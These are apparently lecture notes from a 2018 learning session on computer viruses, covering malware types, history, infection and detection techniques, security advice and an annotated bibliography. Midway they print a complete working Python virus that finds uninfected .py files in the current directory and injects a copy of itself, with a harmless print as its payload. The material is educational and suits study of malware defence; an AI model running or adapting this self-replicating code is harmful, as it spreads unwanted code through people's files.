Friday Learning Session, Aug 17, 2018 (for comments: hunan131@gmail.com)
- definition of 'computer virus'
- difference between viruses and other forms of malware
- brief history
- late 80s, mainly targetting DOS and derivatives
- Cohen proves a number of theoretical results
- components of a virus and demo
- infection strategies
- prepending, appending, cavity
- compressing
- evolving: monomorphic, polymorphic (encrypting)
- direct-action vs resident
- detection strategies
- traditional: scanning, monitoring
- machine-learning
- advice
- keep stuff up to date
- don't trust binaries (OSS)
- don't curl and shell random scripts
- literature
A computer virus is any program that makes a copy of itself using other programs. The copy doesn't have to be an exact one. As we'll see, there are viruses that infect their hosts with modified copies of themselves.
Viruses are often confused with other programs, such as worms, trojan horses, backdoors, logic bombs, and a host of other malware. Let's look at the main types (for a more detailed list, take a look at (Szor 2005, §2.3).)
- virus: a program that copies itself using other programs
- worm: a program that duplicates itself, usually over a network
- mailer: a worm that spreads through email attachments
- trojan horse: a useful program that has additional, malicious functionality (e.g. a word processor program that periodically sends your text to its creator)
- backdoor: a program that allows a hidden or undocumented access to a system resource
- keylogger: a program that logs keys and sends (streaming or batch) to attacker
- rootkits: a set of utilities installed or used by malware after infiltration (user- vs kernel-level)
- dropper: a program that installs a virus (subtype: injectors target RAM)
- flooders: a program that participates in a DOS attack
- The idea of a self-replicating machines occurs to John van Neumann
- Cohen 1984 -- coins the term "computer virus"; first proofs and demos
- CCC 1987 -- congress on viruses ("I curse the day I bought a hard drive")
- late 80s -- first computer viruses appear in the wild
- 1988 -- Morris worm
- skip to 2010 -- Stuxnet
- these days -- cryptoviruses
Please do not run this. For demonstration purposes only.
#..^..START..^..
import os
SIGNATURE = '#..^..VI..^..'
START, END = '#..^..START..^..', '#..^..END..^..'
def interesting(path):
if path.split('.')[-1] == 'py':
return True
def infected(path):
with open(path) as fp:
for line in fp:
line = line.strip()
if SIGNATURE == line:
return True
return False
def search():
for path in os.listdir('.'):
if os.path.isfile(path) and interesting(path) and not infected(path):
return path
def copy(fp):
with open(__file__) as fp2:
started = False
for line in fp2:
if line.strip() == START:
started = True
else:
if not started:
continue
if line.strip() == END:
fp.write(END + '\n')
break
fp.write(line)
fp.write('\n')
def infect(candidate):
# read contents and fix the signature index
with open(candidate) as fp:
old, index = [], 0
for i, line in enumerate(fp):
index += int(line.startswith('#'))
old.append(line)
# re-write the contents, prepending the signature and injecting code
with open(candidate, 'w') as fp:
if not old:
copy(fp)
for i, line in enumerate(old):
# add signature & copy self
if i == index:
fp.write(SIGNATURE + '\n')
copy(fp)
# write the rest of the original file
fp.write(line)
def trigger():
return True # if some condition holds
def damage():
print('Might want to install an anti-virus')
def main():
candidate = search()
# if candidate found, we infect, otherwise nothing to do.
if candidate:
infect(candidate)
print(candidate + ' has been infected')
# if conditions are met, we do some damage
if trigger():
damage()
main()
#..^..END..^..
Most malware these days seem to be either trojan horses, backdoors, or randomware. Decades of back and forth between virus and antivirus writers has helped develop systems that are very difficult to run the classic viruses on. What we discuss here is mainly of historical and conceptual interest, not necessarily something you can write and deploy on a modern machine.
The example virus we looked at is a direct-action virus. It targets other programs and spreads when they're executed. A much more dangerous class of viruses targets not programs, but processes! In an operating system without proper process isolation (such as DOS, MS-DOS, CP/M), a memory-resident virus is injected into a shared located in RAM. The virus is able to hook the interrupt vector table (think of this as installing a package as Express or Flask middleware) and wait for other processes to run. When they do, they'll make system resource requests via interrupts/syscalls, which before going to the operating system will pass through the virus, which can then use these opportunities to do all sorts of damage.
- boot sector: target boot sectors of devices, so that the virus runs before the operating system has time to put the proper protection in place
- overwriters, prependers, appenders, amoebas
- entry-point obscuring (EPO): randomly choose location of virus; jump to it
- cavity: exploit empty spaces in program
- embedded decrpytor: cut parts of program code out, replace with sharded decryptor, jump to first shard, decrpyt virus, put cut out pieces back, jump start
- compressors: as obfuscation, as payload
- metamorphic: change code during infection using non-cryptographic means
- polymorphic: change code during infection using cryptographic means
- scanning: checksum binaries, especially important ones, like terminals/shells
- monitoring: system calls, number of threads, cpu and disk usage, etc.
- machine-learning approach: treats virus detection as a supervized classification problem
- features are: location, filenames, sizes, system call profile, number of threads used, etc.
- Bontchev (1991) "The Bulgarian and Soviet Virus Writing Factories"
- Good historical article. I found it inspiring thirteen years ago.
- Burger (1991) Computer Viruses and Data Protection
- Outdated. Mostly focuses on DOS and CP/M operating systems. Has nice lists of virus signatures and interrupts. Burger is not a fan of Cohen's theoretical work, so don't take what he says about Cohen too seriously.
- Cohen (1984) "Computer Viruses - Theory and Experiments"
- This is the work that established computer virology as a field of study within computer science. Cohen coins the term "computer virus" in this work. It's full of theoretical and practical insights.
- Filiol (2005) Computer Viruses. From Theory to Applications
- Excellent "textbook" on viruses and malware. Filiol doesn't shy away from theory, but also contains lots of practical advice. Covers the history before and after Cohen.
- Goodrich, Tamassia (2014) Introduction to Computer Security
- There's a very brief overview of malware in this classical textbook.
- Ludwig (1991) The Little Black Book of Computer Viruses
- Ludwig's "Black Books" are classics of the genre. He provides actual virus source code as appendices! He has been an inspiration to me for defending our right to understand, analyize, and create (in controlled environments) viruses.
- Ludwig (1995) The Giant Black Book of Computer Viruses
- Richardson (2009) "Virus detection with machine learning"
- PhD thesis dedicated to casting and solving virus detection as a supervized classification problem.
- Szor (2005) The Art of Computer Virus Research and Defense
- This is a (now pretty outdated) classic in the antivirus community. Written by one of the lead security experts at Symantec. Section 4.3 goes deep into Windows 95 viruses. Nothing of use to a unix/linux virus writer.